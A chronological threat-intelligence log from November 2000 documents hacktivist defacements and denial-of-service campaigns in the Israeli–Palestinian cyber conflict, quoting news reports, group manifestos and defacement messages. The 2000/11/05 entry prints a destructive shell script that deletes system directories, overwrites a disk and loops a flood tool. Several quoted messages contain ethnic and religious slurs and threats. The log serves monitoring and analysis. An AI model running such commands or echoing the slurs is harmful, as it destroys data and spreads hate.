Strategic Security Intelligence

Cyber War in the Middle East

November, 2000

Update 2000/11/17, 17:52 (GMT) - MAGLAN-Information Warfare Research Lab.

The on-line bank "LinkBank" from New York, USA, was hacked by Pro-Palestinians Underground "GForcae Pakistan". The hackers left behind few messages, e.g. "save Kashmir and Save Palestine". Although the web administrator was apparently re-build and the web site, under the section "play with it" - The LinkBank Demo, more messages from "GForcae Pakistan can be found.

The Israeli hackers underground "m0sad team" defaced the United Arab Emirates (Abu Dhabi) "Khaleejcom Trading" web site.

More web sites were defaced from both sides, apparently the Pro-Palestinians Underground are much more "successful".

Update 2000/11/23, 12:09 (GMT) - MAGLAN-Information Warfare Research Lab.

UNITY the Pro-Palestine's Group News (23.11.00).

Cyber War: Operation Mohammed Al-Durah( was attacked.)

Statement by Iron Guards.

This is a message to the israeli people, government and whoever stands by them. Today Inshaa: Allah,WednesDay, November 21, 2000, and at 8pm GMT The Israeli web site WWW.ISRAEL.COM has been attacked and stopped. By doing this ( and we will keep on doing it until they leave our land entirely) we send the criminals israelis a message; For killing our children, women, and civilians. For occupying our land. For demolishing our houses, mosques and churches. For not keeping your promises. For being nasty and dreadful, 'and just for being Zionists. We will keep on growing fear in your heart, YOU WILL NEVER FEEL SAFE nor secured in our land, behind your weapons, behind a rock or tree, in your bed, not even in your dreams, ...and for sure not in cyberspace. This is not the first attack and inshaa' Allah it will not be the last. And for staff, your worst dream have just begun, do you are best to retrieve control on your network, we promise you a horrible surprise.

Update 2000/11/23, 08:38 (GMT) - MAGLAN-Information Warfare Research Lab.

UNITY the Pro-Palestine's Group News (22.11.00).

Update 2000/11/19, 14:06 (GMT) - MAGLAN-Information Warfare Research Lab and FCA.

According Al-Awda' we site:

As part of their activities, they encourage others to act to aide their cause. Some examples include:

This site seems primarily aimed at the United States Palestinian population. For example, they advise their constituents to "Lobby congressional representatives in your areas." and so forth.

One more worthwhile quote from their web site:

Update 2000/11/18, 08:38 (GMT) - MAGLAN-Information Warfare Research Lab.

Virtual Peace - First steps ?

The Pro-Palestinians Hacker "Peace @ Palestine and Pakistan Zindabad" known as wall as "m0r0n/nightman" that were attacked and defaced many Israeli web sites \ networks in the last 45 days, hit last night the Mail server '' manage by the Israeli ISP Internet Gold. The attackers left a few messages behind while an important part of it brought here below:

In the same time, but in Hebrew, the Israeli Underground "Support Israel" ( published a message calling to stop the attacks against nay type of Palestinians, Pro-Palestinians and Arabic web sites \ networks.

Although the words above and in parallel, other pro-Palestine's underground "tR|cky" hit Israeli academic web sites the "Achva College" (, while the Israeli underground "Israel Net Force" is currently control a significant Denial of Service attacks against the largest Arabic portal and search engine - El-Aroob (for more information see update for the day before).

Update 2000/11/17, 18:04 (GMT) - MAGLAN-Information Warfare Research Lab.

For the First time: The Israel Underground "polo0" ( defined new offensive target besides the Pro- Palestinian \ Arabic argets - an Israeli target!. The "polo0" ask "mainly to attack" the Gush Shalom web site (Israeli Peace organization - ). Gush Shalom is a non-partisan and extra-parliamentary grass roots movement, whose aim is to influence public opinion, composed of Jews and Arabs, Independents as well as members of political parties and other organizations. The web site hosted at

The Israeli underground "Israel Net Force" is currently control a significant Denial of Service attacks against the largest Arabic portal and search engine: EL AROOB The attacks are based on ICMP flooding. The attacks are supervises via classified chat room.

The Israeli underground "The Israel Hackers - Unity" ( defines new offensive Palestinian or Pro-Palestinian \ Arabic targets as follows:,,,,

Update 2000/11/15, 09:04 (GMT) - MAGLAN-Information Warfare Research Lab.

The Israeli Hacker Ehud Tenebaum - 'The Analyzer' formerly arrested by the *FBI on 1998 due to implicated in widespread and systemic attacks against US military servers, helps the Israeli Ethical Internet Underground (IIU) to protect Israeli networks against the Cyber attackers of Islamic and Pro-Palestinian's groups.

>From the IIU Manifesto (

MAGLAN was fundamentally explored the IIU and the relation to Mr. Tenebaum 'The Analyzer' - 2XS) and concludes the following:

Israeli security companies / experts asks to deliver a warring message to heir client in order NOT to be contact the IIU and 2XS and condemn the IIU and 2XS for such non-professional actions.

*More info on the 'Analyzer' -

Instant 08:00CDT - 10 Nov 2000 (EmergencyNet).

Jewish Students Threatened With New "Kristallnacht"

KNPQwest, a German internet company is reporting an massive e-mail spam, that threatened a group of Jewish students in Germany with a new "Kristallnacht" or "Night of Broken Glass," and shut down a server for two hours on Tuesday.

Reportedly, the blast of e-mail messages was signed by "" KNPQwest said that the messages had come through a server in the United States, but could not verify if that is where they originated. German police, in the southern state of Baden-Wuerttemberg, reportedly said that they may have difficulty in prosecuting "hate crimes that originate in other countries."

ERRI computer security analysts said that such spam attacks are only one iteration of what appears to be an ever escalating pattern of "Hacktivism" in support of varying kinds of ideology....both good and bad.

Update 2000/11/12 17:54 (GMT) - MAGLAN-Information Warfare Research Lab.

New Cyber War technique - "Auction attack"

MAGLAN completed the analysis of a new cyber weapon used by undergrounds, mainly by Pro-Palestine's against Israeli targets - The "Auction attack".

The Auction Flow: (from Yahoo): “We hope you find that Yahoo! Auctions is a great place to make money and have fun. Part of making Yahoo! Auctions a fun place to buy and sell involves placing auctions in the appropriate category and deleting auctions that violate our Terms of Service. We established the Neighbourhood Watch program to provide Yahoo! Auctions users a way to communicate their views on individual listings with our sellers and our Customer Care team. Only users with positive ratings and can review auctions. If the auction receives more negative reviews, our Customer Care team will review your auction and reserves the right to take appropriate action and note this action on your userID….”

The Auction attack: Negative rating “flood” will cause a product to be “push out”. Financial lost are promised, mainly in case of an e-commerce company based an on-line and auction sales.

Up to now few Israeli companies were reported on the “Action attacks”, while obtaining more than 15 negative rating in the same data and exactly the same time. All of these companies are sales Jewish products.

Update 2000/11/13, 06:04 (GMT) - MAGLAN-Information Warfare Research Lab.

Israeli Hacker Undergrounds (NiTR8; lion/type_o) hit last night the web site of The University Of Isfahan, IRAN (Red Hat/Linux 2.1.122 - 2.2.16 with a Web Server: Apache/1.3.12). The site that was hacked is part of the Iranian Research Organization for Science & Technology network at Tehran. In addition, 2 Pakistani web sites were hit: The Hafeez Center and Pakistan Data Services at Islamabad In all cases the Hackers left a messages behind against the GFORCE Pakistan Underground and the Hizballah.

The Pro-Palestinian undergrounds (apparently new “tR|cky”) fight-back and hit the Israel academia Shavatz High School The hackers left behind messages against the Israeli aggressive in additional to reproachful the Israeli hackers “lion/type_o”. Last evening the Pro-Palestinian undergrounds hit 6 Israeli web sites.

Update 2000/11/11 07:34(GMT) - MAGLAN-Information Warfare Research Lab.

                           Cyber War still on

UNITY - The Pro-Palestinian Underground News 06.11.2000

AS we promised in UNITY we still launching our attacks on selected Zionist or Zionist backed networks, Early on Sunday morning Most of the official Zionist Site were down, and we noticed that after they were brought online again that they had new IPs, so we have modified our attack that what ever IP the Zionist dot our attack will find them, also we noted a childish action f the Zionist net works security teams, of sending a windows application message threats the user that they discovered them, although it is s plain lie, we have modified our code so this window will never appear again.

The modified version of Attack is attached to this message, you can also use it while it is on your hard disk, just unzip the page and open the index.html file, because some times our pages are being shut down by Zionists. Also we are preparing for a surprise next few days,

Our Attack Site (Please visit and forward):

Update 2000/11/10, 12:52(GMT) - MAGLAN-Information Warfare Research Lab.

Massive offensive activity origin from Kuwait based "Al-Shayer" Networks directed to wide range of Israeli Internet Networks was recorded in the last 3 hours and still continues while writing those lines. The activity may indicate on an intelligence process, while broad scanning strategies of UDP and TCP are taking place.

Update 2000/11/10 , 07:43(GMT) - MAGLAN-Information Warfare Research Lab.

The cyber clashes over the Middle East continues, entered today to the 40 day of the virtual conflicts. Internet web sites defaced, networks were penetrated and many more attack's events were recorded from the Israeli side as well as from the Pro-Palestinian and the general Arab world side. Few new undergrounds were established; Intelligence tactic and attacks capabilities are improves nearly on a daily base. Enhancements over attack's event coordination and recursive support from professional Hacker are noted, emphasizing low potential for trace-back.

Selected events occurred between the 2000/11/07 - 2000/11/10


Israel defaced web sites (commercial, technological, hi-tech, religious, academic):

Update 2000/11/08, 06:01(GMT) - MAGLAN-Information Warfare Research Lab.

Lucent: Casualty of Mideast Cyberwar ?

Nov 06, 2000 (Tech Web - CMP via COMTEX)

Lucent Technologies Inc. may have been the target of an attack by pro-Palestinian hackers because of its business affiliations in Israel, said security information company LogiKeep Inc. Lucent (stock: LU) was hit Nov. 2 by the DoS Defend attack tool, according to a LogiKeep official. Once a hacker has targeted a site with Defend, the site is forced to refresh every 2.5 seconds. If thousands of hackers target the same site, the targeted system will freeze.

"This confirms the concerns that the pro-Palestinian hackers will spread cyberattacks to U.S. companies and government agencies connected with Israel," the official said.

"We've been saying for some time that hacking isn't going to be limited to curious teenagers, lone criminals, and industrial spies," said Lance Hayden, a manager for Cisco Secure Consulting Services group and former CIA officer. "The next logical step in hacking is the coordinated and structured attack designed to achieve a specific goal or agenda," he said. "U.S. companies have to be concerned about this, because hostilities -- whether on the battlefield or in cyberspace -- are rarely limited to the actual combatants."

"Eventually, the hostilities spill over and affect bystanders," he added. "Companies, organizations, and governments affiliated with one side or the other become logical targets for opposing forces."

The extent of the attack is still not known. Lucent officials weren't available for immediate comment.

--6 November 2000 AT&T Targeted by Palestinian Group A Palestinian group is waging an online battle against AT&T for repairing the website of the Israeli parliament, urging its subscribers to cancel their services.

According to:,1367,39913,00.html?tw=wn20001106

"AT&T is a responsible corporation and should not sustain violations of human rights by supporting one of the main sources of breaches of international humanitarian law -- namely the Israeli occupying forces," said a Hanthala representative. "AT&T's close proximity to human rights violations is not very favorable of its name and stature in corporate America."

An AT&T spokeswoman declined to comment. "We don't discuss individual customers or potential customers," she said.

Update 20000/11/06, 19:36(GMT) - MAGLAN-Information Warfare Research Lab.

Some screen shots from the Islamic underground forum - UNITY

One industry source told The Jerusalem Post that the CIA has sent officials here to observe the cyber violence in real-time, but the US Embassy has denied that any such visits are taking place.

Jerusalem Post November 5, 2000

BREAKING NEWS: Attack was successful Dear Friends..

Our counter attack against the 3 Primary Zionist sites was successful, all the 3 sites went down last night.. yes one of them was restored today, but 3 still out of services. The Zionist New paper "Yadoith Ahrnot" confirmed that today, also We have just received form an American Journalist asking for details as the Zionist government accused us of being responsible about it. her you are the Journalist e-mail:

Hello. I am a journalist with an American newspaper. The Israeli government alleges that you are trying to block its websites. Is this true? Who are you?

As we congratulate All freedom fighters with this success we are asking you to keep visiting the link below and forward it to every one, there is still one site (The most harmful one) online.. our target is not to block any side from expressing its point of view.. Our target is to defend our self-form people who try to eliminate us from even expressing our fair cause:

Update 2000/11/06, 15:55(GMT) - MAGLAN-Information Warfare Research Lab.

The Pro-Palestinian underground 'UNITY' established a new offensive web site (, against Israeli Internet Networks / webs, while defining new targets and related Information. Part of it bring here below:

"Be one of the defenders of Resistance's web sites via intense access to the following sites and clicking 'Click Here and Help the Resistance'. Please, inform all your friends to be part of this campaign." Upon clicking 'Defend the Resistance', an automatically programmed file will be ready to stage counterattacks against some of the 'Zionist' web sites which try to hit the Resistance's sites. This counterattack will continue as long as you have an access to Internet.

The counter attack was successful, each site attacked were sent down at least once for duration between 1 day to 6 days , CNN,BBC and many other News agencies reported about the massive failures of the Zionist sites, but we still need your help, JOIN THE STRUGGLE (you can read samples of the articles written about the counter attack at the bottom of the page).

Press Release regards the Cyber War: Read the Daily Star Article., Read Israel Internet Article, Listen to the Manger of the Information Department in the Zionist Foreign Affairs Ministry.

Update 2000/11/06, 10:23(GMT) - MAGLAN-Information Warfare Research Lab.

The Israeli Underground "Hizballah No More" (ISRAFORCE) hit the Lebanon official Hizballah TV web site "MANAR TV" and Islamic Resistance Support Association web site the The attacks are based on an automatic script run from ISRAFORCE web site against various Islamic offensive targets.

The Pro-Palestinian Underground "GForce Pakistan" hit an Israeli commercial web site Jerusalem Books (Virtual Store) The Hacker were left few massages and sign in the name of "GREETS dodi \ RSH PHC \ #rootworm \ Khaled \ m0r0n & nightman \ m0s \ hack weiser and HIZBALLAH".

Update 2000/11/06 , 05:23(GMT) - MAGLAN-Information Warfare Research Lab.

The Pakistan Web site of the "Shaheed Zulfiqar Ali Bhutto Institute of Science and Technology" , was hacked, by a pro-Israeli underground. The web site based Windows NT Server, with Microsoft-IIS/4.0. The Hacker left few messages and picture behind, e.g. : ""FREE OUR CITIZEN, FREE OUR SOLDIERS, AND FREE RON ARAD! lion & type_o "

(Ron Arad is an Israeli Lieutenant Colonel captured by the group "Amal" when he bailed out of his plane in Lebanon in October 1986).

Update 2000/11/05 , 18:51 (GMT) - MAGLAN-Information Warfare Research Lab.

Mr. Boaz Dolev, head of the Israeli Governmental Servers-Infrastructures, exposed today that a Pro-Palestine's web site, operates from the U.S. with the logo of "ORACLE" publishes a distraction messages against Israel and calling for a cyber War against Israel, while suggesting some DoS scripts. The information was confirmed by "ORACLE" International, which promised checking this issue.

Update 2000/11/05, 18:34 (GMT) - MAGLAN-Information Warfare Research Lab.

Israel proposed to the Hizballah a Virtual Cease-Fire

An Exclusive article published few days ago at the Saudi-Arabia news paper "AL Watan" claim that the Israeli parliament member Michal Eitan ('Likud', Head of the Israeli Parliament 'Kenset' Internet Committee) contacted the Hizballah Network supervisor - Mr. Malich Housien via an American journalist in order to deliver a proposal for stopping the Cyber War over the Middle East.

Mr. Malich Housien rejected the Israeli offer and said that the Cyber War started by Israel. More over Mr. Housien claimed that a picture of Hadi Nassarala (the son of the Hizballah leader, Hasean Nassralla) that was killed 2 years ago in a military battle with the Israeli Army (IDF) was sent directly to the Hizballah leader, Hasean Nassralla e-mail. Since only the Israeli Military has access to the fighting zone (Lebanon) only the Israeli intelligence was able to send the picture. This event indicates on the large involvements of the Israeli military intelligence in the current Cyber War.

Mr. Michal Eitan did not deny the story above but just ask to be more accurate with the details. According to Mr. Eitan, during an interview for the Newsweek it was suggested him to talk with the Hizballah Network supervisor, however the contact wasn't established, since the condition for such conversation were not operational.

MAGLAN - Information Research Lab ask to point out the many version for this story already were develop around.

Update 2000/11/05, 17:54 (GMT) - MAGLAN-Information Warfare Research Lab.

Do professional Israeli's Hackers take the advantage of the Cyber War over the Middle-East in order to practice on "life" targets? Preliminarily attack-signatures analysis done by MAGLAN - Information Warfare Research Lab. indicated that attack describes below, is apparently not origin by Pro-Palestinian underground. The attacker/s signatures give the impression of being Israelis or Pro-Israelis! (Unfortunately, MAGLAN cannot publish the comprehensive analysis data since it confidential information). [FC - this appears to be motivated by a desire to intensify the conflict]

The Israeli web site of COGNIFIT ( was hacked by an hacker named "dodi". A long message was left behind by the hacker, a part of it includes, as well as part of the offensive script:

banner "Die Kalb" > /dev/lp0 &
	# from palestine with love
rm -rf /var/ & rm -rf  /home & rm -rf /etc &
	# just to make sure :)
cat /dev/urandom > `df | grep dev | awk '{print $1}' | head -1` &
	# double check HEH
unset HISTFILE ;unset HISTFILESIZE ; unset HISTSIZE ; rm -rf /root &
while (true); do nohup ./juno 80 & done
	# expect this all year you jewz at the idf

[FC - analysis of this script is as follows:

All of the following are supposed to be started in sequence and operate in parallel without other indication to the users or operators.

This script, while it may function on many systems, is not very well designed, seems to be oriented toward particular types of Unix systems and is designed to run as the superuser. - end FC]

Update 2000/11/05, 16:10(GMT) - MAGLAN-Information Warfare Research Lab.

The Hackers Underground "GFORCE Pakistan" keep the attacks on Israeli web sites and networks, in the last 5 hours were hit:

Update 2000/11/05 , 06:13 (GMT) - MAGLAN-Information Warfare Research Lab.

The Pro-Israeli fight back and hit the Agricultural Statistics And Information Department Network ( - web host of the Informatiques research and development office at Tehran, Iran. The Hackers left a message : "if you lame PAKIES LaMEFORCE will keep taking down .il sites we will take down .ir/.lb/ and the we will get to lame .pk KEEP OUT OF THIS you dont belong to this mess oh yeah.. and FUCK ALL ARABS!!! lion&type_o ha k'eil"

The Pro-Palestinian Hackers group hit 2 Israeli web sites "hacked by m0r0n and nightman of Pakistan and there is only one reason behind this defacement and that is the WAR OF ISRAEL with PALESTINIANS!":

Update 2000/11/05, 14:12(GMT) - MAGLAN-Information Warfare Research Lab.

One of the web sites belongs to the Israeli Institute for Research and Development Educational Programs and Teachers Training - MOFET was hacked ( The hacker left a message "(Own3d by Galahad ... O Kra e AHB cr3w ... slak atropelar e facil ne.. o que se acha podre nao faca entao..... CHmod o hackao do front page auhahuauah.... tanx to: BIONATUS, mafioso, the magic, noel, tankDS,a toda associacao hacker brasileira - AHB e amigos e aliados)".

Preliminarily attack-signatures analysis done by MAGLAN - Information Warfare Research Lab. indicated that it's not absolutely clear if this attack was part of the Cyber War occurs in the Middle East.

Update 2000/11/04, 21:54 (GMT+02:00) - MAGLAN-Information Warfare Research Lab.

New Israel Underground established named the "IsraelHackers" with the manifesto "We are now becoming an army Of the Israeli Soldiers on the net Our Troopers Cannot Die Just Their Computers can burn! Or a site is going to crash! We Are the Israeli Soldiers of The internet Our goal is to search and destroy All Of the Arab's Sites on the net! or to Del as many of the Arabs Computers To kill their Chats And icq's."

The "IsraelHackers" were define the following offensive targets : ; ; ; ; .The attacks methods remained Denial of Service". The site try to coordinate the attacks based on ICQ channels.

Update 2000/11/04 , 07:58 (GMT) - MAGLAN-Information Warfare Research Lab.

The Pro-Palestinian Hackers group 'Gforce Pakistan' hit in the last day 6 Israeli web sites:

In all cases the Hackers were left various messages, all of them mentioned "Thanks to Doctor Nuker " and some pictures. This is the first time for such a large number of non-governmental web sites hit in the same 8 hours, apparently by the same "group" during the current Cyber War over the Middle East.

Update 2000/11/04, 10:10 (GMT)
Hackers launch 'phase three' of online intifada
Ranwa Yehia
Daily Star staff

Arab hackers are attempting to divert Israeli funds from buying weapons and ammunition to fight the Palestinians by forcing the Jewish state to invest in repairing and safeguarding internet service providers in Tel Aviv.

In an e-mail sent to The Daily Star, the staff of UNITY website, created to encourage Arab supporters to target Israeli sites in an attempt to down them, announced that phase three of the cyberwar has begun.

'Remember, the more money they lose in fixing and strengthening their systems means less money to buy bullets and rockets for use against our children,' stated the e-mail, addressed to Arab internet users who have been active in attacking Israeli sites.

'Maybe you can't hold a gun and fight, but you can contribute in the struggle by visiting and forwarding the counter attack links,' it said, listing the links: and

'Every dollar they lose means one less bullet for the Zionist soldiers' ammunition, it means a life of a Palestinian child,' the e-mail said.

One of the UNITY staffers, who spoke to The Daily Star on condition of anonymity, said the attacks were simply an 'act of self-defense.' He also threatened that Israeli e-commerce sites would be attacked if Israelis and their supporters 'attempt to touch any anti-Zionist site.'

Attacking e-commerce sites is listed as phase four in the cyberwar attack. UNITY said the aim would make the Israelis lose 'millions of dollars in losses in transactions.' The reason phase three of the cyberwar was initiated, the staff member explained, was because Israelis and their supporters hacked into Hizbullah's Al-Manar Television website last week, combined with 'a Zionist action against UNITY.' 'All this forced us to start phase three of the cyberwar,' he said.

Alan Abbey, the managing editor of an Israeli website,, posted an article on the website describing how moving hosts out of Israel was 'shaking up the high-tech business community.'

Due to what Abbey described as 'the serious threat of cyber-terrorism,' a web company, Webstyle, is moving all of its Israeli-based hosting to the US, making them harder to attack.

However, Arab hackers have become so effective that even the FBI has warned that the cyber attacks on Israeli sites could 'spill over' to the US.

A recent advisory from the FBI's cybercrime unit said: 'Due to the credible threat of terrorist acts in the Middle East region, and the conduct of these web attacks, (internet users) should exercise increased vigilance to the possibility that US government and private-sector websites may become potential targets.'

The FBI said the method of attacks against Israeli websites included automated e-mail floods and high volumes of coordinated requests for web services by pro-Palestinians.

The FBI has recommended certain security measures for government agencies and private businesses. Security officials should be prepared to take appropriate steps to prevent e-mail flood attacks, block source e-mail addresses in the event of a flooding, and ensure that appropriate patches are installed in operating systems to limit vulnerability to other denial-of-service attack methods.

In response, UNITY circulated an e-mail encouraging 'every freedom fighter with networking and hacking skills to contact them at

UNITY is also encouraging Arab website owners to post hacking codes because UNITY sites are being constantly attacked by pro-Israelis.

Sites promoting cyberattacks on Israeli sites which are still running are:

Update 2000/11/03, 17:18 (GMT+02:00) - MAGLAN-Information Warfare Research Lab.

Two new Pro-Israeli hackers undergrounds were established. The undergrounds delivers comprehensive information on large number of Palestinian's computerized and communication offensives targets. "Gocool" - attack's target - Nassarele.Net and other site based on TurkTelecom, KMT-Halikarnas Interaktif Medya A.S. Istanbul, Turkey.

"Polo0" - various attack's targets with very interesting detailed information and instructions:

Israeli hackers release - Denial of Service weapons, a new versions :

Update 2000/11/03, 06:37 (GMT - MAGLAN-Information Warfare Research Lab.

The Royal Jordanian web site ( was hacked last night. The hackers lest few messages behind. e.g. : "Every 3.6 seconds someone dies of hunger. 75% are children".

Preliminarily attack-signatures analysis done by MAGLAN - Information Warfare Research Lab. indicated that it's not absolutely clear if this attack was part of the Cyber War occurs in the Middle East.

Update 2000/11/03, 07:12 (GMT+02:00) - MAGLAN-Information Warfare Research Lab.

The Pakistan Hackers Club strongly in involve in the cyber war over the middle East, last night hacking targets where:

while writing those lines more logical offensive activity recording against some Israeli targets apparently by the Pakistan Hackers Club.

2000/11/02 07:00 PM EST - Lucent says Mideast hackers attacked Web site

By Erich Luening, CNET

Just days after the FBI warned that the cyberwar raging in the Middle East between hackers from both sides of the conflict could spread to the United States, Lucent Technologies on Thursday confirmed that its Web site was the victim of at least one attack by pro-Palestinian hackers.

Ben Venzke, director of intelligence production, iDefense Lucent, based in Murray Hill, N.J., may be the first of many U.S. companies and government agencies to be targeted by pro-Palestinian hackers because of its ongoing business in Israel, experts said.

"There could be other organizations hit here in the U.S., but this is the first U.S. corporation named directly on target lists being circulated by pro-Palestinian hacker groups I've seen so far," said Ben Venzke, director of intelligence production at iDefense.

The Fairfax, Va.-based Internet security company has been monitoring the cyberattacks by pro-Palestinian and pro-Israeli groups that have mounted in recent months because of the violence in Israel.

Lucent was hit by what is called a Defend tool, which is similar to the FloodNet program designed and used by Zapatista rebels against the Mexican government during that civil war, Venzke said.

An individual hacker has to target a specific Web site using the Defend tool. Once it is set up and hitting the Web site, it constantly refreshes the page every 2.5 seconds. The only way it can do damage is if thousands of hackers target the same Web site. If requests to the Web page from the attackers come fast enough, the target computer will freeze up.

The Defend tool is different from the Tribe Flood Network, which is more powerful and harder to detect than this version because an attacker secretly embeds software into hundreds of computers, Venzke said. Then, at a selected time, a command is issued that prompts the infected computers to swamp a target Web site or server with messages in a so-called denial-of-service attack. The program does not damage the "infected" computers or the target, but the sudden flood of messages typically knocks out the target system.

"Lucent, like many other companies, is doing business in Israel and has been named as a target by Unity, a pro-Palestinian group" that ironically has had a number of its Web sites attacked by pro-Israeli hackers, Venzke said.

The attack on Lucent comes just days after the FBI issued a warning that the recent email flooding and denial-of-service attacks that shuttered and defaced both Israeli and Palestinian Web sites in the past month could "spill over" to the United States.

Although he would not detail the type of attack on his company's Web site, Lucent spokesman John Skalko said the attack was proven to have come from pro-Palestinian hackers.

"We're aware of this stuff coming from all over the world," Skalko said. "We were ready for this attack because of what we learned from the 'Melissa' attacks last March. That was a wake-up call for all of us. We're always on alert and looking for these types of things to occur."

The Melissa virus struck individuals and businesses hard when it first hit the Internet, causing more than $80 million in damage. The $80 million total was related to the time spent by systems administrators to clear the virus off affected computers.

Although Melissa was an email-related virus, Skalko said the security awareness at his company sparked by the virus allows it to meet cyberthreats early on.

So far, pro-Palestinian attackers have hit at least 30 sites, and at least 15 sites have been hit by pro-Israeli attackers, according to iDefense.

Echoing the earlier warning from the FBI, Venzke said government agencies and businesses in the United States should be prepared for anything as the conflict continues in Israel.

Update 2000/11/02, 17:02 (GMT) - MAGLAN-Information Warfare Research Lab.

Massive Denial of Service, Port Scans, Mail, News and Forum flooding attacks were recorded today against various Israeli networks, apparently mainly directed to the Israeli Governmental Network. Enormous attacks were directed as well as to the Israeli web site (contradicted to the official Hizbollah web site

Some Israeli hackers / crackers said today at chat and forum discussion : that only defensive action required and call for stopping any "Internet violence" against Islamic and pro-Palestine's web sites and networks, however from the other side some were ask to "Attack and - they provide hosting for hi/ezba/" (apparently, this is as well as a new targets definition by Israeli hackers). - Internet survey running in the last days ask "if you agree to coordinate Cyber attacks on webs sites over Arabic countries" the results shows : 25.2% against the cyber attacks, 37.3% don't care and 37.7 agree to those internet attacks and even participate on them. (number surveyed = 1505).

Today is the first time to expose that in the Middle East Cyber War, Virus and Vandals were use as logical weapons. MAGLAN - Information Warfare Research Lab currently collecting and analyzing this issue.

Update 2000/11/01 , 19:08 (GMT) - MAGLAN-Information Warfare Research Lab.

The Pro-Palestine Hacker hit the Israeli web site of "MBA International School of Business Administration Management" and left a message behind as follows : "An Israeli site hacked! By m0r0n and nightman! Reasons... JUST ONE!! STOP THE BLOoDY ATTROCITIES ON THE PALESTINIANS!!!!!!!!! Kashmir problem to us, indeed, is a very big problem but then looking at the PALESTINIans!! AND the war that they are having against the CORRUPTED ISRAELIS i think it needs a lot of attention too!! All the queries to and Pakistan Zindabad!"

Update 2000/11/01, 18:49 (GMT) - MAGLAN-Information Warfare Research Lab.

Hackers (apparently Israeli underground) were attacked and intrude the Palestinian web site of "Ramallah Expert Team On Vocational Training and replace the default html with picture of a pig reading in the Islamic holy book 'The Koran' and an ape's picture 'dressed' over Mr. Arafat face (the Palestinian leader). MAGLAN - Information Warfare Research Lab., ask to condemn any logical and physical attacks on religiosity base.